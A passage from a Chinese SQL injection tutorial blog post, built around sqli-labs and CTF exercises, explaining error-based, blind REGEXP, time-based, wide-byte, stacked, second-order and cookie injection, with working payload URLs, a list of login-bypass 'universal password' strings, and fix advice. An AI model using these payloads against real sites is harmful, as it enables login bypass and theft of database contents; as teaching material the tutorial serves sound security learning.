information_schema.columns where table_name=&#x27;flag&#x27; limit 0,1))a from information_schema.tables group by a)b</span><br><span class="line"></span><br><span class="line">查询字段内容：</span><br><span class="line">http://222.18.158.243:4606/?id=1 and 1=2  union select 1 from (select+count(*),concat(floor(rand(0)*2),(select flag from flag))a from information_schema.tables group by a)b</span><br></pre></td></tr></table></figure></li>
<li><h3 id="ExtractValue报错注入"><a href="#ExtractValue报错注入" class="headerlink" title="ExtractValue报错注入"></a><strong>ExtractValue报错注入</strong></h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">EXTRACTVALUE (XML_document, XPath_string)</span><br></pre></td></tr></table></figure>

<ul>
<li><p>第一个参数：XML_document 是 String 格式，为 XML 文档对象的名称</p>
</li>
<li><p>第二个参数：XPath_string (Xpath 格式的字符串).</p>
<p>作用：从目标 XML 中返回包含所查询值的字符串</p>
<p>ps：返回结果限制在32个字符以内</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">/</span><span class="operator">/</span> 可以将 <span class="keyword">user</span>() 改成任何我们想要查询的函数和<span class="keyword">sql</span>语句 ,<span class="number">0x7e</span>表示的是 <span class="operator">~</span></span><br><span class="line">http:<span class="operator">/</span><span class="operator">/</span><span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span><span class="operator">/</span>sqli<span class="operator">/</span>Less<span class="number">-1</span><span class="operator">/</span>?id<span class="operator">=</span><span class="number">-1</span><span class="string">&#x27;  and extractvalue(1,concat(0x7e,user(),0x7e))#</span></span><br><span class="line"><span class="string">// 通过这条语句可以得到所有的数据库名，更多的关于informaion_schema的使用看文章头部</span></span><br><span class="line"><span class="string">http://127.0.0.1/sqli/Less-1/?id=-1&#x27;</span>  <span class="keyword">and</span> extractvalue(<span class="number">1</span>,concat(<span class="number">0x7e</span>,(<span class="keyword">select</span> schema_name <span class="keyword">from</span> information_schema.schemata limit <span class="number">0</span>,<span class="number">1</span>),<span class="number">0x7e</span>))#</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RY6GfH"><img src="https://z3.ax1x.com/2021/06/27/RY6GfH.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RY6GfH.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RY6GfH.png"></a></p>
</li>
</ul>
</li>
<li><p><strong>UpdateXml报错注入</strong></p>
<p>UpdateXml 函数的本意是更新 XML 文档，但如果在 XPath 路径参数的位置写入子查询并拼接特殊字符，就会因为不符合 XPath 语法而报错；而报错时该子查询其实已经被执行，其结果会出现在错误信息中。</p>
<ul>
<li><pre><code>UPDATEXML (XML_document, XPath_string, new_value)</code></pre>
<ul>
<li>第一个参数：XML_document 是 String 格式，为 XML 文档对象的名称，文中为 Doc 1</li>
<li>第二个参数：XPath_string (Xpath 格式的字符串) ，如果不了解 Xpath 语法，可以在网上查找教程。</li>
<li>第三个参数：new_value，String 格式，替换查找到的符合条件的数据</li>
</ul>
<p>作用：改变文档中符合条件的节点的值</p>
<pre><code>// 可以将 user() 改成任何我们想要查询的函数和sql语句 ,0x7e表示的是 ~
http://127.0.0.1/sqli/Less-1/?id=-1'  and updatexml(1,concat(0x7e,user(),0x7e),1)#
// 通过这条语句可以得到所有的数据库名
?id=1 ' union select updatexml(1,concat(0x7e,(select database()),0x7e),1) --+</code></pre>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RY6H39"><img src="https://z3.ax1x.com/2021/06/27/RY6H39.png" alt="RY6H39.png"></a></p>
</li>
</ul>
</li>
</ul>
<h4 id="REGEXP正则匹配"><a href="#REGEXP正则匹配" class="headerlink" title="REGEXP正则匹配"></a>REGEXP正则匹配</h4>
<p>正则表达式，又称规则表达式（Regular Expression，在代码中常简写为regex、regexp或RE），计算机科学的一个概念。正则表达式通常被用来检索、替换那些符合某个模式(规则)的文本</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/Rt3AVx"><img src="https://z3.ax1x.com/2021/06/28/Rt3AVx.png" alt="Rt3AVx.png"></a></p>
<p>在 {} 内只有一个整型参数 i，表示字符只能出现 i 次；在 {} 内有一个整型参数 i，后面跟一个“,”，表示字符可以出现 i 次或 i 次以上；在 {} 内有一个整型参数 i，后面跟一个“,”，再跟一个整型参数 j，表示字符只能出现 i 次以上、j 次以下（包括 i 次和 j 次）。其中的整型参数必须大于等于 0，小于等于 RE_DUP_MAX（默认是 255）。如果有两个参数，第二个必须大于等于第一个。</p>
<pre><code>[a-dX]</code></pre>
<p>匹配“a”、“b”、“c”、“d”或“X”</p>
<pre><code>[^a-dX]</code></pre>
<p>匹配除“a”、“b”、“c”、“d”、“X”以外的任何字符。</p>
<p>“[”、“]”必须成对使用</p>
<pre><code>mysql&gt; select "aXbc" REGEXP "[a-dXYZ]"; -&gt; 1（表示匹配）
mysql&gt; select "aXbc" REGEXP "^[a-dXYZ]$"; -&gt; 0（表示不匹配）
mysql&gt; select "aXbc" REGEXP "^[a-dXYZ]+$"; -&gt; 1（表示匹配）
mysql&gt; select "aXbc" REGEXP "^[^a-dXYZ]+$"; -&gt; 0（表示不匹配）
mysql&gt; select "gheis" REGEXP "^[^a-dXYZ]+$"; -&gt; 1（表示匹配）
mysql&gt; select "gheisa" REGEXP "^[^a-dXYZ]+$"; -&gt; 0（表示不匹配）</code></pre>
<p>已知数据库名为 security，判断第一个表的表名是否以 a-z 中的字符开头，^[a-z] --&gt; ^a ; 判断出了第一个表的第一个字符，接着判断第一个表的第二个字符 ^a[a-z] --&gt; ^ad ; 就这样，一步一步判断第一个表的表名 ^admin$ 。然后用 limit 1,1 判断第二个表。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">// 判断security数据库下的第一个表的是否以a-z的字母开头</span><br><span class="line">http://127.0.0.1/sqli/Less-1/?id=1&#x27; and  1=(select 1 from information_schema.tables where table_schema=&#x27;security&#x27; and table_name regexp &#x27;^[a-z]&#x27; limit 0,1) #</span><br></pre></td></tr></table></figure>

<h4 id="宽字节注入"><a href="#宽字节注入" class="headerlink" title="宽字节注入"></a>宽字节注入</h4><p>宽字节注入是由于不同编码中中英文所占字节数的不同所导致的。通常来说，在GBK编码当中，一个汉字占用2个字节。而在UTF-8编码中，一个汉字占用3个字节。在php中，我们可以通过 echo strlen("中") 来测试，当为GBK编码时，输出2，而为UTF-8编码时，输出3。除了GBK以外，所有的ANSI编码中，中文都是占用两个字节。</p>
<p>相关文章：<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_36119192/article/details/84138312">https://blog.csdn.net/qq_36119192/article/details/84138312</a></p>
<p>在说之前，我们先说一下php中对于sql注入的过滤，这里就不得不提到几个函数了。</p>
<p>addslashes()函数，这个函数在预定义字符之前添加反斜杠 \ 。预定义字符： 单引号 ' 、双引号 " 、反斜杠 \ 、NULL。但是这个函数有一个特点就是虽然会添加反斜杠 \ 进行转义，但是 \ 并不会插入到数据库中。这个函数的功能和魔术引号完全相同，所以当打开了魔术引号时，不应使用这个函数。可以使用 get_magic_quotes_gpc() 来检测是否已经转义。需要注意的是，addslashes() 只按单字节处理输入，并不了解数据库连接所使用的字符集，这正是宽字节注入得以成立的前提。</p>
<p>mysql_real_escape_string() 函数，这个函数用来转义sql语句中的特殊符号 \x00 、\n 、\r 、\ 、' 、" 、\x1a。该函数会参考当前连接的字符集进行转义；它所属的 mysql_* 扩展已在 PHP 7.0 中移除，新代码应改用 mysqli 或 PDO 的参数化查询。</p>
<p><strong>魔术引号</strong>：当打开时，所有的单引号 '、双引号 "、反斜杠 \ 和 NULL 字符都会被自动加上一个反斜线来进行转义，这个和 addslashes()函数的作用完全相同。所以，如果魔术引号打开了，就不要使用addslashes()函数了。一共有三个魔术引号指令。（注意：魔术引号自 PHP 5.3.0 起被废弃，并在 PHP 5.4.0 中移除，以下说明只适用于旧版本 PHP。）</p>
<ol>
<li>magic_quotes_gpc 影响到 HTTP 请求数据（GET，POST 和 COOKIE）。不能在运行时改变。在 PHP 中默认值为 on。参见 get_magic_quotes_gpc()。</li>
<li>magic_quotes_runtime 如果打开的话，大部份从外部来源取得数据并返回的函数，包括从数据库和文本文件，所返回的数据都会被反斜线转义。该选项可在运行的时改变，在 PHP 中的默认值为 off。参见 set_magic_quotes_runtime() 和 get_magic_quotes_runtime()。</li>
<li>magic_quotes_sybase 如果打开的话，将会使用单引号对单引号进行转义而非反斜线。此选项会完全覆盖 magic_quotes_gpc。如果同时打开两个选项的话，单引号将会被转义成 ‘’。而双引号、反斜线 和 NULL 字符将不会进行转义。如何取得其值参见 ini_get()</li>
</ol>
<ul>
<li><p>我们这里搭了一个bugkuCTF练习平台的题目为例：</p>
</li>
<li><p>题目：sql注入</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RYcJET"><img src="https://z3.ax1x.com/2021/06/27/RYcJET.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYcJET.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYcJET.png"></a></p>
</li>
</ul>
<p><strong>宽字节注入的修复</strong></p>
<p>在调用 mysql_real_escape_string() 函数之前，先设置连接所使用的字符集为GBK ，即 mysql_set_charset('gbk', $conn) 。这个方法是可行的，因为 mysql_real_escape_string() 会按照连接的字符集来转义。但是还是有很多网站是使用的addslashes()函数进行过滤，我们不可能把所有的addslashes()函数都换成mysql_real_escape_string()。</p>
<p>所以防止宽字节注入的另一个方法就是将 character_set_client 设置为binary(二进制)。需要在所有的sql语句前指定连接的形式是binary二进制：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysql_query(&quot;SET character_set_connection=gbk, character_set_results=gbk,character_set_client=binary&quot;, $conn); </span><br></pre></td></tr></table></figure>

<p>当我们的MySQL收到客户端的请求数据后，会认为它的编码是character_set_client所对应的编码，也就是二进制。然后再将它转换成character_set_connection所对应的编码。然后进入具体表和字段后，再转换成字段对应的编码。当查询结果产生后，会从表和字段的编码转换成character_set_results所对应的编码，返回给客户端。所以，当我们将character_set_client编码设置成了binary，就不存在宽字节注入的问题了，所有的数据都是以二进制的形式传递。更稳妥的做法是改用参数化查询（预编译语句），让用户输入不再参与SQL语句的拼接。</p>
<h4 id="堆叠注入"><a href="#堆叠注入" class="headerlink" title="堆叠注入"></a>堆叠注入</h4><p>堆叠注入，顾名思义，就是将语句堆叠在一起进行查询<br>原理很简单，mysqli_multi_query() 支持多条sql语句同时执行，语句之间用 ; 分隔，成堆的执行sql语句，例如</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from users;show databases;</span><br></pre></td></tr></table></figure>

<p>就同时执行以上两条命令，所以我们可以增删改查，只要权限够<br>虽然这个注入姿势很牛逼，但实际遇到很少，其可能受到API或者数据库引擎，又或者权限的限制，只有当调用的数据库函数支持执行多条sql语句时才能够使用。mysqli_multi_query()函数就支持多条sql语句同时执行，但实际情况中，如PHP为了防止sql注入，往往使用的数据库函数是mysqli_query()函数，其只能执行一条语句，分号后面的内容将不会被执行，所以可以说堆叠注入的使用条件十分有限，一旦能够被使用，将可能对网站造成十分大的威胁</p>
<ul>
<li> <strong>漏洞造成代码分析</strong></li>
</ul>
<p>  sqli-labs38</p>
<p>  <a target="_blank" rel="noopener" href="https://imgtu.com/i/RYcLGQ"><img src="https://z3.ax1x.com/2021/06/27/RYcLGQ.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYcLGQ.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYcLGQ.png"></a></p>
<p>  对输入的参数没有进行严格的过滤，攻击者构造恶意的攻击语句造成了SQL注入攻击，存在回显点，可以进行联合注入，并且如果出现错误，会输出报错信息，这里也可以使用显错注入。<br>  还可以看到，这里的SQL语句查询使用的是mysqli_multi_query函数，mysqli_multi_query函数可以执行多条SQL语句。</p>
<p>  <a target="_blank" rel="noopener" href="https://imgtu.com/i/RYcxrq"><img src="https://z3.ax1x.com/2021/06/27/RYcxrq.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYcxrq.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYcxrq.png"></a></p>
<p>  可以看到，我们堆叠查询的语句执行成功，那么我们可以在堆叠的SQL语句使用时间盲注的语句。</p>
<p>  <a target="_blank" rel="noopener" href="https://imgtu.com/i/RYczq0"><img src="https://z3.ax1x.com/2021/06/27/RYczq0.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYczq0.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYczq0.png"></a></p>
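<p>  上面这个代码，程序获取GET参数ID，使用PDO的方式进行数据查询，但仍然将参数ID拼接到查询语句，导致PDO没起到预编译的效果，程序仍然存在SQL注入漏洞。<br>  使用PDO执行SQL语句时，可以执行多条语句，不过这样通常不能直接得到注入结果，因为PDO只会返回第一条SQL语句执行的结果，所以在第二条语句中可以用update更新数据或者使用时间盲注获取数据。<br>  修复时应使用占位符绑定参数（prepare 加 execute），不要把参数拼接进SQL字符串；如果业务不需要多语句执行，可在建立连接时将 PDO::MYSQL_ATTR_MULTI_STATEMENTS 设为 false。</p>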
<p>  <a target="_blank" rel="noopener" href="https://imgtu.com/i/RYgCIU"><img src="https://z3.ax1x.com/2021/06/27/RYgCIU.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYgCIU.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYgCIU.png"></a></p>
<p>  <strong>总结</strong></p>
<p>  这个注入方式并不是很常用，理解和使用也较为简单，但是利用姿势比较多样特别，要多加理解和运用。</p>
<h4 id="二次注入"><a href="#二次注入" class="headerlink" title="二次注入"></a>二次注入</h4><p>二次注入漏洞是一种在Web应用程序中广泛存在的安全漏洞形式。相对于一次注入漏洞而言，二次注入漏洞更难以被发现，但是它却具有与一次注入攻击漏洞相同的攻击威力。</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RYgFG4"><img src="https://z3.ax1x.com/2021/06/27/RYgFG4.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYgFG4.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYgFG4.png"></a></p>
<ol>
<li>黑客通过构造数据的形式，在浏览器或者其他软件中提交HTTP数据报文请求到服务端进行处理，提交的数据报文请求中可能包含了黑客构造的SQL语句或者命令。</li>
<li>服务端应用程序会将黑客提交的数据信息进行存储，通常是保存在数据库中，保存的数据信息的主要作用是为应用程序执行其他功能提供原始输入数据并对客户端请求做出响应。</li>
<li>黑客向服务端发送第二个与第一次不相同的请求数据信息。</li>
<li>服务端接收到黑客提交的第二个请求信息后，为了处理该请求，服务端会查询数据库中已经存储的数据信息并处理，从而导致黑客在第一次请求中构造的SQL语句或者命令在服务端环境中执行。</li>
<li>服务端返回执行的处理结果数据信息，黑客可以通过返回的结果数据信息判断二次注入漏洞利用是否成功</li>
</ol>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RYgBWQ"><img src="https://z3.ax1x.com/2021/06/27/RYgBWQ.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYgBWQ.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYgBWQ.png"></a></p>
<h4 id="User-Agent注入"><a href="#User-Agent注入" class="headerlink" title="User-Agent注入"></a>User-Agent注入</h4><p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RYgLTK"><img src="https://z3.ax1x.com/2021/06/27/RYgLTK.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYgLTK.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYgLTK.png"></a></p>
<h4 id="Cookie注入"><a href="#Cookie注入" class="headerlink" title="Cookie注入"></a>Cookie注入</h4><p>如今绝大部分开发人员在开发过程中会对用户传入的参数进行适当的过滤，但是很多时候，由于个人对安全技术了解的不同，有些开发人员只会对get，post这种方式提交的数据进行参数过滤。</p>
<p>但我们知道，很多时候，提交数据并非仅仅只有get / post这两种方式，还有一种经常被用到的方式：request(“xxx”),即request方法。通过这种方法一样可以从用户提交的参数中获取参数值，这就造成了cookie注入的最基本条件：使用了request方法，但是只对用户get / post提交的数据进行过滤。</p>
<p>我们这里有一个链接：<a target="_blank" rel="noopener" href="http://www.xx.com/search.asp?id=1">www.xx.com/search.asp?id=1</a></p>
<p>我们访问：<a target="_blank" rel="noopener" href="http://www.xx.com/search.asp">www.xx.com/search.asp</a>　发现不能访问，说缺少id参数。</p>
<p>我们将id=1放在cookie中再次访问，查看能否访问，如果能访问，则说明id参数可以通过cookie提交。</p>
<p>那么，如果后端没有对cookie中传入的数据进行过滤，那么，这个网站就有可能存在cookie注入了！</p>
<h4 id="过滤绕过"><a href="#过滤绕过" class="headerlink" title="过滤绕过"></a>过滤绕过</h4><p>待更新。</p>
<h4 id="传说中的万能密码"><a href="#传说中的万能密码" class="headerlink" title="传说中的万能密码"></a>传说中的万能密码</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">sql=&quot;select*from test where username=&#x27; XX &#x27;  and password=&#x27; XX &#x27;  &quot;;</span><br><span class="line">1：&quot;or &quot;a&quot;=&quot;a</span><br><span class="line">2： &#x27;)or(&#x27;a&#x27;=&#x27;a</span><br><span class="line">3：or 1=1--</span><br><span class="line">4：&#x27;or 1=1--</span><br><span class="line">5：a&#x27;or&#x27; 1=1--</span><br><span class="line">6：&quot;or 1=1--</span><br><span class="line">7：&#x27;or&#x27;a&#x27;=&#x27;a</span><br><span class="line">8：&quot;or&quot;=&quot;a&#x27;=&#x27;a</span><br><span class="line">9：&#x27;or&#x27;&#x27;=&#x27;</span><br><span class="line">10：&#x27;or&#x27;=&#x27;or&#x27;</span><br><span class="line">11：1 or &#x27;1&#x27;=&#x27;1&#x27;=1</span><br><span class="line">12：1 or &#x27;1&#x27;=&#x27;1&#x27; or 1=1</span><br><span class="line">13： &#x27;OR 1=1%00</span><br></pre></td></tr></table></figure>

<h2 id="注"><a href="#注" class="headerlink" title="注"></a>注</h2><p>Timing Attack注入，也就是时间盲注。通过简单的条件语句比如 and 1=2 是无法看出异常的。</p>
<p>在MySQL中，有一个Benchmark() 函数，它是用于测试性能的。Benchmark(count,expr) ，这个函数执行的结果，是将表达式 expr 执行 count 次 。</p>
<p>因此，利用benchmark函数，可以让同一个函数执行若干次，使得结果返回的时间比平时要长，通过时间长短的变化，可以判断注入语句是否执行成功。这是一种边信道攻击，这个技巧在盲注中被称为Timing Attack，也就是时间盲注。</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RYgvfe"><img src="https://z3.ax1x.com/2021/06/27/RYgvfe.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYgvfe.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYgvfe.png"></a></p>
<p>利用前提：页面上没有显示位，也没有输出 SQL 语句执行错误信息。正确的 SQL 语句和错误的 SQL 语句返回页面都一样，但是加入 sleep(5)条件之后，页面的返回速度明显慢了 5 秒。</p>
<p>优点：不需要显示位，不需要出错信息。</p>
<p>缺点：速度慢，耗费大量时间</p>
<p>sleep 函数判断页面响应时间        if(判断条件，为true时执行，为false时执行)</p>
<p>我们可以构造下面的语句，判断条件是否成立。然后不断变换函数直到获取到我们想要的信息</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">//判断是否存在延时注入</span><br><span class="line">http://127.0.0.1/sqli/Less-1/?id=1&#x27; and sleep(5)#</span><br><span class="line"> </span><br><span class="line">// 判断数据库名的第一个字符的ascii值是否小于100，如果小于100，页面立即响应，否则页面延时5秒响应</span><br><span class="line">http://127.0.0.1/sqli/Less-1/?id=1&#x27;andif(ascii(substring(database(),1,1))&lt;100,1,sleep(5)) #</span><br></pre></td></tr></table></figure>



<h2 id="感谢"><a href="#感谢" class="headerlink" title="感谢"></a>感谢</h2><p><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s?__biz=Mzg3MTA1NDMxMw==&mid=100000183&idx=1&sn=414bda2e22753a9bd5a57ffebd3e0e8c&chksm=4e852f3179f2a627eecaffb02969a8435b3b3e737cf26d631581d86f976a58efe103c1757335&mpshare=1&scene=23&srcid=0625mQzmrBAli11fDcmAk4Zb&sharer_sharetime=1624580435225&sharer_shareid=cf169812543d2d844bcc7a739c22d12e#rd">https://mp.weixin.qq.com/s?__biz=Mzg3MTA1NDMxMw==&amp;mid=100000183&amp;idx=1&amp;sn=414bda2e22753a9bd5a57ffebd3e0e8c&amp;chksm=4e852f3179f2a627eecaffb02969a8435b3b3e737cf26d631581d86f976a58efe103c1757335&amp;mpshare=1&amp;scene=23&amp;srcid=0625mQzmrBAli11fDcmAk4Zb&amp;sharer_sharetime=1624580435225&amp;sharer_shareid=cf169812543d2d844bcc7a739c22d12e#rd</a></p>

      </div>
      <div class="post-tags-categories">
        
        <div class="tags">
          
            <a href="/tags/SQL%E6%B3%A8%E5%85%A5/" class="">
              SQL注入
            </a>
          
        </div>
        
      </div>
      
        <div class="copyright">
  <ul class="post-copyright">
    <li class="post-copyright-author">
    <strong>作者:  </strong>阳阳
    </li>
    <li class="post-copyright-link">
    <strong>文章链接:  </strong>
    <a href="/2021/06/27/2020-12-17-sql-zhu-ru-lou-dong-xiang-jie/" target="_blank" title="SQL注入漏洞详解">https://yangyang-linux.gitee.io/2021/06/27/2020-12-17-sql-zhu-ru-lou-dong-xiang-jie/</a>
    </li>
    <li class="post-copyright-license">
      <strong>版权声明:   </strong>
      本网站所有文章除特别声明外,均采用 <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank" title="Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)">CC BY-NC-ND 4.0</a>
      许可协议。转载请注明出处!
    </li>
  </ul>
</div>
      
    </article>

    
    

    



    
    


  </div>


  <!-- 图片放大 Wrap images with fancybox support -->
  <script src="/js/wrapImage.js"></script>
</div>







      </main>
    </div>

    <!-- 页脚 -->
    
  
  <!-- 底部鱼儿跳动效果，依赖于jquery-->
<div id="j-fish-skip" style=" position: relative;height: 153px;width: auto;"></div>
<script>
  var RENDERER = {
    POINT_INTERVAL: 5,
    FISH_COUNT: 3,
    MAX_INTERVAL_COUNT: 50,
    INIT_HEIGHT_RATE: .5,
    THRESHOLD: 50,
    FISH_COLOR: '',
    init: function () {
      this.setFishColor(); this.setParameters(), this.reconstructMethods(), this.setup(), this.bindEvent(), this.render()
    },
    setFishColor: function () {
      let isDark = JSON.parse(localStorage.getItem('dark')) || JSON.parse('false');
      if (isDark) {
        this.FISH_COLOR = '#222'; // 暗黑色，有时间把这整成一个变量
      } else {
        this.FISH_COLOR = '' || '#42b983';
      }
    },
    setParameters: function () {
      this.$window = $(window), this.$container = $("#j-fish-skip"), this.$canvas = $("<canvas />"), this.context = this.$canvas.appendTo(this.$container).get(0).getContext("2d"), this.points = [], this.fishes = [], this.watchIds = []
    },
    createSurfacePoints: function () {
      var t = Math.round(this.width / this.POINT_INTERVAL);
      this.pointInterval = this.width / (t - 1), this.points.push(new SURFACE_POINT(this, 0));
      for (var i = 1; i < t; i++) {
        var e = new SURFACE_POINT(this, i * this.pointInterval),
          h = this.points[i - 1];
        e.setPreviousPoint(h), h.setNextPoint(e), this.points.push(e)
      }
    },
    reconstructMethods: function () {
      this.watchWindowSize = this.watchWindowSize.bind(this), this.jdugeToStopResize = this.jdugeToStopResize.bind(this), this.startEpicenter = this.startEpicenter.bind(this), this.moveEpicenter = this.moveEpicenter.bind(this), this.reverseVertical = this.reverseVertical.bind(this), this.render = this.render.bind(this)
    },
    setup: function () {
      this.points.length = 0, this.fishes.length = 0, this.watchIds.length = 0, this.intervalCount = this.MAX_INTERVAL_COUNT, this.width = this.$container.width(), this.height = this.$container.height(), this.fishCount = this.FISH_COUNT * this.width / 500 * this.height / 500, this.$canvas.attr({
        width: this.width,
        height: this.height
      }), this.reverse = !1, this.fishes.push(new FISH(this)), this.createSurfacePoints()
    },
    watchWindowSize: function () {
      // Cancel pending timers, remember the current window size, and schedule a size check.
      this.clearTimer();
      this.tmpWidth = this.$window.width();
      this.tmpHeight = this.$window.height();
      var timerId = setTimeout(this.jdugeToStopResize, this.WATCH_INTERVAL);
      this.watchIds.push(timerId);
    },
    clearTimer: function () {
      // Cancel every pending resize timer, newest first, leaving the id list empty.
      while (this.watchIds.length > 0) {
        var timerId = this.watchIds.pop();
        clearTimeout(timerId);
      }
    },
    jdugeToStopResize: function () {
      var currentWidth = this.$window.width();
      var currentHeight = this.$window.height();
      // Loose equality is kept from the original comparison.
      var unchanged = currentWidth == this.tmpWidth && currentHeight == this.tmpHeight;
      this.tmpWidth = currentWidth;
      this.tmpHeight = currentHeight;
      // Rebuild the scene only when the size matches the one recorded by watchWindowSize.
      if (unchanged) {
        this.setup();
      }
    },
    bindEvent: function () {
      // Window resize restarts the size watcher.
      this.$window.on("resize", this.watchWindowSize);
      // Pointer entering or moving over the container feeds the epicenter handlers.
      this.$container.on("mouseenter", this.startEpicenter);
      this.$container.on("mousemove", this.moveEpicenter);
    },
    getAxis: function (t) {
      // Convert the event's client coordinates to container coordinates:
      // subtract the container offset and add the window scroll position.
      var origin = this.$container.offset();
      var px = t.clientX - origin.left + this.$window.scrollLeft();
      var py = t.clientY - origin.top + this.$window.scrollTop();
      return { x: px, y: py };
    },
    startEpicenter: function (t) {
      // Record where the pointer entered, as the reference for the next move.
      var entry = this.getAxis(t);
      this.axis = entry;
    },
    moveEpicenter: function (t) {
      var current = this.getAxis(t);
      // No previous position recorded yet: use the current one, giving a zero delta.
      if (!this.axis) {
        this.axis = current;
      }
      // Disturb the surface with the vertical distance moved since the last event.
      this.generateEpicenter(current.x, current.y, current.y - this.axis.y);
      this.axis = current;
    },
    generateEpicenter: function (t, i, e) {
      // Only react within THRESHOLD of the vertical middle of the canvas.
      var middle = this.height / 2;
      if (i < middle - this.THRESHOLD || i > middle + this.THRESHOLD) {
        return;
      }
      // Nearest surface point to x; ignore positions outside the point list.
      var index = Math.round(t / this.pointInterval);
      if (index < 0 || index >= this.points.length) {
        return;
      }
      this.points[index].interfere(i, e);
    },
    reverseVertical: function () {
      // Flip the scene's vertical orientation and tell every fish to do the same.
      this.reverse = !this.reverse;
      var total = this.fishes.length;
      for (var k = 0; k < total; k++) {
        this.fishes[k].reverseVertical();
      }
    },
    controlStatus: function () {
      var k;
      var total = this.points.length;
      // Two passes: every point updates itself before any neighbour forces are computed.
      for (k = 0; k < total; k++) {
        this.points[k].updateSelf();
      }
      for (k = 0; k < total; k++) {
        this.points[k].updateNeighbors();
      }
      // While below the target population, count down and add one fish each time
      // the counter reaches zero. The counter only ticks while fish are missing.
      if (this.fishes.length < this.fishCount) {
        this.intervalCount -= 1;
        if (this.intervalCount == 0) {
          this.intervalCount = this.MAX_INTERVAL_COUNT;
          this.fishes.push(new FISH(this));
        }
      }
    },
    render: function () {
      // Schedule the next frame first, then advance the simulation and repaint.
      requestAnimationFrame(this.render);
      this.controlStatus();
      this.context.clearRect(0, 0, this.width, this.height);
      this.context.fillStyle = this.FISH_COLOR;
      var k, total;
      for (k = 0, total = this.fishes.length; k < total; k++) {
        this.fishes[k].render(this.context);
      }
      // Fill the surface polygon with the "xor" composite operation set for this path only.
      this.context.save();
      this.context.globalCompositeOperation = "xor";
      this.context.beginPath();
      // The polygon is closed along the bottom edge, or the top edge when reversed.
      this.context.moveTo(0, this.reverse ? 0 : this.height);
      for (k = 0, total = this.points.length; k < total; k++) {
        this.points[k].render(this.context);
      }
      this.context.lineTo(this.width, this.reverse ? 0 : this.height);
      this.context.closePath();
      this.context.fill();
      this.context.restore();
    }
  },
  SURFACE_POINT = function (t, i) {
    // Keep the owning renderer and the x position, then run init().
    this.renderer = t;
    this.x = i;
    this.init();
  };
  SURFACE_POINT.prototype = {
    // Coefficients used by updateSelf, updateNeighbors and interfere below.
    SPRING_CONSTANT: .03,
    SPRING_FRICTION: .9,
    WAVE_SPREAD: .3,
    ACCELARATION_RATE: .01,
